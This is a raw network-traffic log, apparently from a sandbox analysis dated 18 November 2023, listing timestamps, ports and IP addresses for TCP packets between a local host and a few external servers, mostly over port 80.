Nov 18, 2023 10:02:36.851279020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851291895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851294994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851314068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851326942 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851332903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851350069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851362944 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851372004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851391077 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851408005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851408958 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851425886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851442099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851460934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851474047 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851479053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851495028 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851495981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851511955 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851516008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851533890 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851551056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851558924 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851567984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851583958 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851588964 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851600885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851618052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851634979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851638079 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851651907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851669073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851675034 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851686954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851692915 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851703882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851721048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851733923 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851737976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851756096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851772070 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851773024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851789951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851790905 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851805925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851824045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851828098 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851840019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851856947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851862907 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851874113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851891041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851907015 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851908922 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851924896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851939917 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851943016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851960897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851963043 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.851979017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851996899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.851999998 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852014065 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852030993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852036953 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852046967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852063894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852065086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852082968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852087021 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852101088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852118015 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852135897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852135897 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852154016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852161884 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852171898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852191925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852199078 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852210045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852226973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852243900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852252960 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852263927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852281094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852283001 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852298021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852315903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852330923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852339029 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852348089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852365017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852381945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852385044 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852397919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852416992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852427006 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852432966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852449894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852449894 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852467060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852484941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852488041 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852502108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852519989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852529049 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852535963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852555037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852555990 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852571964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852588892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852596998 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852606058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852622032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852634907 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852639914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852657080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852659941 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852673054 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852690935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852700949 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852708101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852725029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852741003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852741957 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852757931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852765083 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852776051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852788925 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852792025 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852808952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852826118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852828979 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852843046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852863073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852869987 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852880001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852893114 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852895975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852914095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852931023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852946997 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852947950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852965117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852982044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.852991104 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.852998018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853014946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853032112 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853043079 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853046894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853066921 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853080988 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853082895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853099108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853106022 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853116035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853132963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853152990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853167057 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853171110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853188038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853204012 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853209019 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853220940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853236914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853249073 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853262901 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853266001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853282928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853300095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853317022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853332043 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853332996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853354931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853372097 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853372097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853389978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853399992 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853409052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853426933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853435993 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853442907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853462934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853468895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853481054 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853498936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853512049 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853516102 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853529930 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853533030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853550911 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853566885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853585005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853586912 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853602886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853620052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853636026 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853640079 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853653908 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853667974 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853672028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853688002 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853704929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853720903 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853720903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853739023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853754044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853764057 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853770971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853786945 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853790045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853807926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853820086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853822947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853842020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853842974 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853857994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853874922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853888988 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853892088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853908062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853924990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853925943 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853941917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853957891 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853966951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.853981972 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.853986979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854002953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854021072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854022980 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854038000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854055882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854065895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854073048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854089022 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854089975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854106903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854123116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854140043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854151964 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854156971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854173899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854190111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854201078 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854207039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854223013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854227066 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854238987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854250908 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854263067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854279995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854298115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854312897 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854315996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854334116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854352951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854353905 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854371071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854384899 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854388952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854404926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854406118 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854422092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854440928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854445934 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854456902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854474068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854487896 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854490995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854509115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854511023 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854526043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854542971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854552984 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854559898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854578018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854597092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854597092 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854618073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854626894 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854635000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854651928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854655027 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854669094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854686975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854698896 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854703903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854720116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.854743958 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.854779005 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.856203079 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.886607885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.886655092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.886701107 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.892050982 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:36.892066956 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:36.892170906 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:36.892174959 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:36.892251968 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:36.892254114 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:36.892349005 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:36.922314882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.922827005 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.942961931 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.108715057 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:37.123866081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.123893976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.123914003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.123997927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124006033 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124016047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124042988 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124049902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124068975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124084949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124106884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124119043 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124125004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124141932 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124145985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124164104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124169111 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124181032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124200106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124206066 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124216080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124237061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124253035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124258995 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124270916 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124286890 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124294043 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124304056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124317884 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124320984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124339104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124352932 CET	49744	80	192.168.2.4	194.49.94.120
